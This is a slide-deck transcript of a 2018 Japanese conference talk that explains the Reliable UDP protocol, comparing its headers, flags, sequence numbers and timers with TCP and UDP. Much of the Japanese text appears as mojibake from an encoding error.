$30 off During Our Annual Pro Sale. View Details »

詳解 Reliable UDP

Fadis
November 08, 2018

詳解 Reliable UDP

謎の伝送制御プロトコルRUDPの詳細について解説します
これは2018年11月10日に行われた Kernel/VM/探検隊@北陸 part 4 での発表資料です
サンプルコード: https://github.com/Fadis/rudp

Fadis

November 08, 2018
Tweet

More Decks by Fadis

Other Decks in Programming

Transcript

 1. ৄղ Reliable UDP
  NAOMASA MATSUBAYASHI
  https://github.com/Fadis/rudp
  ͜ͷൃදʹొ৔͢Δαϯϓϧίʔυ

  View Slide

 2. ΠϯλʔωοτΛհͯ͠ૹ৴͞ΕΔύέοτ͸
  ༷ʑͳػثΛܦ༝ͯ͠૬खʹಧ͘
  ܦ࿏্Ͱύέοτ͸
  ૿͑Δ
  ফ͑Δ
  ॱ൪͕ೖΕସΘΔ
  ಺༰͕ॻ͖׵ΘΔ

  View Slide

 3. TCP
  22൪ϙʔτʹσʔλΛૹΓ·͢
  ͜ͷσʔλͷ൪߸͸0x0217f806Ͱ͢
  νΣοΫαϜ͸0x9bfeͰ͢
  36116൪ϙʔτʹσʔλΛૹΓ·͢
  ͜ͷσʔλͷ൪߸͸0x3f31a637Ͱ͢
  νΣοΫαϜ͸0x857aͰ͢
  0x0217f806ड͚औΓ·ͨ͠

  ฉ͑͜ͳ͔͔ͬͨͳ
  36116൪ϙʔτσʔλΛૹΓ·͢
  ͜ͷσʔλͷ൪߸͸0x3f31a637Ͱ͢
  νΣοΫαϜ͸0x857aͰ͢
  0x0217f806ड͚औΓ·ͨ͠

  View Slide

 4. TCP
  ૹ৴ݩϙʔτ Ѽઌϙʔτ
  γʔέϯε൪߸
  ֬ೝԠ౴൪߸
  σʔλ
  Φϑηοτ
  ༧໿ ੍ޚϑϥά ΢Οϯυ΢αΠζ
  νΣοΫαϜ ۓٸϙΠϯλ
  Φϓγϣϯ Մม௕

  0 16 32
  TCP͸ϔομ͕Ͱ͔͍

  View Slide

 5. TCP
  ૹΓ͍ͨσʔλ36όΠτʹ
  32όΠτͷϔομ͕෇͍ͨΓ͢Δ
  23:18:15.313811 IP 192.168.2.1.36260 > 192.168.2.2.ssh: Flags [P.], seq
  1060218459:1060218495, ack 35125382, win 65535, options [nop,nop,TS val
  3309098802 ecr 4292799263], length 36
  0x0000: 4510 0058 7677 4000 4006 3ec5 c0a8 0201 E..Xvw@.@.>.....
  0x0010: c0a8 0202 8da4 0016 3f31 a65b 0217 f886 ........?1.[....
  0x0020: 8018 ffff 859e 0000 0101 080a c53c d732 .............<.2
  0x0030: ffde eb1f d28c d156 702a 557f 7b7c 5ebd .......Vp*U.{|^.
  0x0040: 5303 9853 5c86 6128 8fc5 ee52 99d7 5eb6 S..S\.a(...R..^.
  0x0050: 3672 5089 12c4 8cae 6rP.....
  IPϔομ TCPϔομ
  ૹΓ͍ͨσʔλ
  TCP͸ϔομ͕Ͱ͔͍

  View Slide

 6. TCP
  RFC793 RFC1071 RFC1122 RFC8200
  RFC2873 RFC5681 RFC6093 RFC6298
  RFC6691
  جຊతͳػೳ
  ࣮૷͕
  ڧ͘ਪ঑͞ΕΔ֦ு
  RFC2675 RFC7323 RFC3168 RFC3390
  RFC3465 RFC6633 RFC2018 RFC3042
  RFC6582 RFC6675 RFC2883 RFC4015
  RFC5682 RFC1191 RFC1981 RFC4821
  RFC1144 RFC6846 RFC4953 RFC5461
  RFC4987 RFC5925 RFC5926 RFC5927
  RFC5961 RFC6528
  ࣮ݧతͳ֦ு RFC2140 RFC3124 RFC7413 RFC2861
  RFC3540 RFC3649 RFC3742 RFC4782

  View Slide

 7. ͋·Γʹ΋ࢀর͢΂͖RFC͕ଟ͍ͷͰ
  TCPʹ͍ͭͯௐ΂Δ࣌ͲͷRFCΛಡΊ͹ྑ͍͔ͷϦετ͕
  RFCʹͳͬͨ
  RFC7414
  TCP͸࢓༷΋Ͱ͔͍
  ࣮ݧతͳ֦ு RFC2140 RFC3124 RFC7413 RFC2861
  RFC3540 RFC3649 RFC3742 RFC4782
  RFC5562 RFC5690 RFC6928 RFC5827
  RFC6069 RFC6937 RFC3522 RFC3708
  RFC4653 RFC5482 RFC6356 RFC6824
  RFC2780 RFC4727 RFC6335 RFC6994

  View Slide

 8. TCP
  ٙ໰
  ͦΜͳʹେ͖ͳϔομͱ
  ڊେͳن֨Λ΋ͬͯ͠ͳ͚Ε͹
  ௨৴ͷ৴པੑΛ֬อͰ͖ͳ͍ͷ͔

  View Slide

 9. UDP
  9000൪ϙʔτʹσʔλΛૹΓ·͢
  νΣοΫαϜ͸0x6ad2Ͱ͢
  9000൪ϙʔτʹσʔλΛૹΓ·͢
  νΣοΫαϜ͸0x04a9Ͱ͢
  ͨͿΜಧ͍ͯΔΑͶ
  ͨͿΜಧ͍ͯΔΑͶ
  σʔλ͕Խ͚͍ͯͳ͍͔Λ֬ೝ͢ΔνΣοΫαϜ͸͋Δ
  ͨͩ͠૬खʹσʔλ͕ಧ͍͍ͯΔ͔͸Θ͔Βͳ͍

  View Slide

 10. UDP
  ૹ৴ݩϙʔτ Ѽઌϙʔτ
  σʔλάϥϜ௕ νΣοΫαϜ
  0 16 32
  ϔομαΠζ͸8όΠτ
  TCPͷΑ͏ʹ֦ுͰΑΓ௕͘ͳΔࣄ΋ͳ͍
  ͨͩ͠૬खʹσʔλ͕ಧ͍͍ͯΔ͔͸Θ͔Βͳ͍

  View Slide

 11. UDP
  RFC768 RFC1071 RFC1122 RFC8200
  جຊతͳػೳ
  RFC2675
  ֦ு
  γϯϓϧͳن֨
  ͨͩ͠૬खʹσʔλ͕ಧ͍͍ͯΔ͔͸Θ͔Βͳ͍
  RFC768 UDPͷجຊతͳػೳʹ͍ͭͯ
  RFC1071 νΣοΫαϜͷܭࢉํ๏

  RFC1122 ࣮૷ʹཁٻ͞ΕΔػೳͷ໌֬Խ

  RFC8200 IPv6ʹ͓͚Δpseudo-headerͷѻ͍Λ௥Ճ

  RFC2675 jumbogram࢖༻࣌ͷσʔλάϥϜ௕ͷѻ͍Λ௥Ճ

  View Slide

 12. UDP
  ٙ໰
  UDPͷ্ʹ
  ίϯύΫτͳ
  ॱং੍ޚͱ࠶ૹ੍ޚΛ࣮૷͢Ε͹
  TCPΑΓখ͞ͳϔομͱখ͞ͳن֨Ͱ
  ৴པੑͷ͋Δ௨৴͕ՄೳͳͷͰ͸

  View Slide

 13. Reliable UDP
  ૹ৴ݩϙʔτ Ѽઌϙʔτ
  σʔλάϥϜ௕ νΣοΫαϜ
  ੍ޚϑϥά ϔομ௕ γʔέϯε൪߸ ֬ೝԠ౴൪߸
  Φϓγϣϯ Մม௕

  νΣοΫαϜ
  0 16 32
  UDPϔομ
  RUDPϔομ
  Plan9͕9PΛ৐ͤΔҝʹੜΈग़ͨ͠৴པੑͷ͋ΔUDP
  RFCʹ΋υϥϑτ্͕͕͍ͬͯΔ͚Ͳυϥϑτཹ·Γ

  View Slide

 14. Reliable UDPͷ੍ޚϑϥά
  4
  :
  /
  "
  $
  ,
  &
  "
  ,
  3
  4
  5
  /
  6

  -
  $
  )
  ,
  5
  $
  4

  ໿
  ͜Εͱ ͜Εͱ ͜Εͱ ͜Εͱ ͜Ε͸ഉଞ
  ੍ޚϑϥάͰηάϝϯτͷ໾ׂΛද͢ͷ͸TCPͱಉ͡
  ੍ͨͩ͠ޚϑϥάͷ಺༁͸TCPͱ͸ҟͳΔ

  View Slide

 15. 4
  :
  /
  "
  $
  ,
  &
  "
  ,
  3
  4
  5
  /
  6

  -
  $
  )
  ,
  5
  $
  4

  ໿
  ηογϣϯͷ։࢝ 4:/

  ηογϣϯͷ։࢝ 4:/"$,

  σʔλͷૹ৴݉֬ೝԠ౴ "$,

  બ୒త֬ೝԠ౴ &",

  ηογϣϯͷऴྃ 345

  ϋʔτϏʔτ /6-

  ΞυϨεͱίωΫγϣϯ*%ͷ࠶ׂΓ౰ͯ 5$4

  View Slide

 16. ACK
  0x40(੍ޚϑϥά) 6(ϔομ௕) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  0 16 32
  ACK͸૬खʹηάϝϯτͷड͚औΓ੒ޭΛ௨஌͢Δ

  View Slide

 17. σʔλ11ૹΔͰ
  ACK(11Έͨ)
  ACK
  σʔλ11ૹΔͰ

  Ұఆ࣌ؒ಺ʹ
  ड͚औΓͷ֬ೝ͕
  Ͱ͖ͳ͍৔߹
  ಉ͡಺༰Λ࠶ૹ
  جຊతͳΞΠσΞ͸TCPͱಉ͡

  View Slide

 18. ACK
  0x40(੍ޚϑϥά) 6(ϔομ௕) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  0 16 32
  RUDPͷݸʑͷηάϝϯτ͸γʔέϯε൪߸Λ࣋ͭ
  ֬ೝԠ౴൪߸ʹ͸૬ख͔Βड͚औͬͨηάϝϯτͷ
  γʔέϯε൪߸͕ೖΔ

  View Slide

 19. ACK
  0x40(੍ޚϑϥά) 6(ϔομ௕) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  σʔλ(Մม௕)
  0 16 32
  ACKηάϝϯτͷશ௕͕ϔομ௕ΑΓ௕͍৔߹
  ͦΕ͸ϖΠϩʔυͱΈͳ͞ΕΔ

  View Slide

 20. σʔλ11ૹΔͰ
  σʔλ85ૹΔͰ(11Έͨ)
  σʔλ12ૹΔͰ(85Έͨ)
  12Έͨ

  ACK
  ֬ೝԠ౴൪߸͸
  σʔλૹ৴࣌ʹ
  ͍ͭͰʹૹΒΕΔ
  Ұఆ࣌ؒૹΔ෺͕
  ແ͔ͬͨ৔߹
  ۭͷACK͕ૹΒΕΔ
  ࠓ͙͢ૹΔ΂͖෺͕ແ͍
  ͪΐͬͱ଴ͬͯΈΔ͔
  ଴͚ͬͨͲૹΔ෺͕ͳ͍
  ֬ೝԠ౴൪߸͚ͩฦͦ͏

  View Slide

 21. 0x40(੍ޚϑϥά) 6(ϔομ௕) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  0 16 32
  ACK
  8bit 8bit
  TCPͷγʔέϯε൪߸͸32bit͕ͩ
  RUDPͷγʔέϯε൪߸͸8bit

  View Slide

 22. 160όΠτ(γʔέϯε൪߸584)
  1020όΠτ(γʔέϯε൪߸744)
  1836·Ͱݟͨ
  TCPͷγʔέϯε൪߸
  12όΠτ(γʔέϯε൪߸1764)
  60όΠτ(γʔέϯε൪߸1776)

  View Slide

 23. 160όΠτ(γʔέϯε൪߸20)
  1020όΠτ(γʔέϯε൪߸21)
  23·Ͱݟͨ
  RUDPͷγʔέϯε൪߸
  12όΠτ(γʔέϯε൪߸22)
  60όΠτ(γʔέϯε൪߸23)

  View Slide

 24. 0x40(੍ޚϑϥά) 6(ϔομ௕) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  0 16 32
  ACK
  ੍ޚϑϥάͷCHK͕
  1ͷ৔߹σʔλΛؚΊͨνΣοΫαϜΛ
  0ͷ৔߹ϔομ͚ͩͷνΣοΫαϜΛೖΕΔ
  ܭࢉํ๏͸
  RFC1071 Computing the Internet Checksum
  (IPϔομͱ͔ʹ΋࢖ΘΕͯΔ΍ͭ)

  View Slide

 25. ACK
  ACK 6 γʔέϯε൪߸ ֬ೝԠ౴൪߸
  0x0000
  σʔλ
  ACK
  CHK 6 γʔέϯε൪߸ ֬ೝԠ౴൪߸
  0x0000
  σʔλ
  ͋Δ࣌ ͳ͍࣌
  ੍ޚϑϥάͷCHK͕
  1ͷ৔߹σʔλΛؚΊͨνΣοΫαϜΛ
  0ͷ৔߹ϔομ͚ͩͷνΣοΫαϜΛٻΊΔ

  View Slide

 26. 3wayϋϯυγΣΠΫ
  SYN
  SYN+ACK
  ACK
  TCPಉ༷ηογϣϯͷ։࢝͸3wayϋϯυγΣΠΫ͔Β
  SYNͰγʔέϯε൪߸ͷಉظΛ௨৴૬खʹཁٻ͢Δ

  View Slide

 27. SYN
  0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32

  View Slide

 28. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  SYN
  0 16 32
  γʔέϯε൪߸ͷॳظ஋ΛϥϯμϜͰܾΊͯૹΔ

  View Slide

 29. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  SYN
  0 16 32
  ֬ೝԠ౴Λ଴ͨͣʹૹͬͯྑ͍࠷େηάϝϯτ਺
  TCPͰݴ͏΢Οϯυ΢αΠζ
  RUDPʹ΢Οϯυ΢੍ޚ͸ແ͍
  ͜͜Ͱࢦఆ͞Εͨ΢Οϯυ΢αΠζ͕ηογϣϯΛด͡Δ·Ͱ࢖ΘΕΔ

  View Slide

 30. 11൪ૹΔͰ
  13൪·ͰݟͨΘ
  12൪ૹΔͰ
  13൪ૹΔͰ
  14൪ૹΔͰ
  ֬ೝԠ౴ແ͠Ͱૹͬͯྑ͍ηάϝϯτ਺͕3ͷ৔߹
  13·Ͱ͸
  ฦ౴Λ଴ͨͣʹ
  ࿈ଓͯ͠ૹΕΔ
  14ΛૹΔʹ͸
  11Ҏ߱ͷACK͕
  ฦΔͷΛ଴ͭ
  ඞཁ͕͋Δ

  View Slide

 31. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  SYN
  0 16 32
  8bit
  Q. ࠷େ255ηάϝϯτ·Ͱ͔͠ઃఆͰ͖ͳ͍Α͏͕ͩେৎ෉͔
  A. ͋·Γେৎ෉͡Όͳ͍͚Ͳγʔέϯε൪߸͕8bit͔͠ͳ͍͔Β
  ͦΕΑΓେ͖͍΢Οϯυ΢αΠζΛೝΊΔͱ
  γʔέϯε൪߸ͷॏෳ͕ى͜Δ

  View Slide

 32. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  SYN
  0 16 32
  1ηάϝϯτ͋ͨΓͷ࠷େαΠζ
  Ұ౓ʹ65535όΠτ
  ·͔͡Α

  View Slide

 33. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  SYN
  0 16 32
  ૹͬͨσʔλʹର͢Δ֬ೝԠ౴͕͜͜Ͱࢦఆͨ࣌ؒ͠
  ฦͬͯ͜ͳ͍৔߹࠶ૹΛߦ͏

  View Slide

 34. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32
  ϋʔτϏʔτ(RUDP༻ޠͰNullηάϝϯτ)ͷૹ৴ִؒ
  ੜ͖ͱΔ͔
  ੜ͖ͱΔͰ

  View Slide

 35. 0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32
  ηάϝϯτΛड͚औ͔ͬͯΒ͜ͷ࣌ؒૹ৴͢΂͖෺͕ແ͔ͬͨΒ
  ͙͢ʹૹΕΔ෺͕ͳͯ͘΋ACKΛ౤͛Δ

  View Slide

 36. SYN
  SYN+ACK
  ACK
  ͜ͷACK΋ACKʹ͸ҧ͍ͳ͍ҝ
  ΫϥΠΞϯτଆ͔Β஻Γ࢝ΊΔ৔߹͜ͷACKʹσʔλ͕৐Δ

  View Slide

 37. όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  ௨৴ෆೳʹͳ͔ͬͯΒ
  ͜͜Ͱࢦఆ͞Εͨ࣌ؒͷ͏ͪʹ
  TCSηάϝϯτΛड͚औͬͨ৔߹
  ঢ়ଶΛҾ͖ܧ͍Ͱ௨৴Λ࠶։͢Δ
  ࢲ͸ؼ͖ͬͯͨ
  ֮͑ͯΔͥ

  View Slide

 38. όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  ͜͜Ͱࢦఆͨ͠ճ਺ηάϝϯτΛ࠶ૹͯ͠΋
  ૬ख͔Β֬ೝԠ౴͕ฦͬͯ͜ͳ͍৔߹
  ௨৴ෆೳঢ়ଶͱ൑அ͢Δ
  ͓͓ηογϣϯʂ͠ΜͰ͠·͏ͱ͸ ҎԼུ
  ϐʔ

  View Slide

 39. όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  ྦྷੵ֬ೝԠ౴ͷ࠷େ਺
  ड͚औ͚ͬͨͲ֬ೝԠ౴Λૹ͍ͬͯͳ͍ηάϝϯτͷ਺͕
  ͜ͷ஋ʹୡͨ͠Β͙͢ʹૹΕΔσʔλ͕ͳͯ͘΋ACKΛ౤͛Δ

  View Slide

 40. ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  લʹདྷΔ͸ͣͷηάϝϯτ͕ಧ͍͍ͯͳͯ͘ड͚औΓΛ׬ྃͰ͖ͳ͍ηάϝϯτ͕
  ͜͜Ͱࢦఆͨ͠਺ʹୡͨ͠Βબ୒త֬ೝԠ౴(EAK)Λ౤͛Δ

  ͋Δ ͋Δ ͳ͍ ͋Δ ͋Δ ͳ͍ ͳ͍

  View Slide

 41. ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
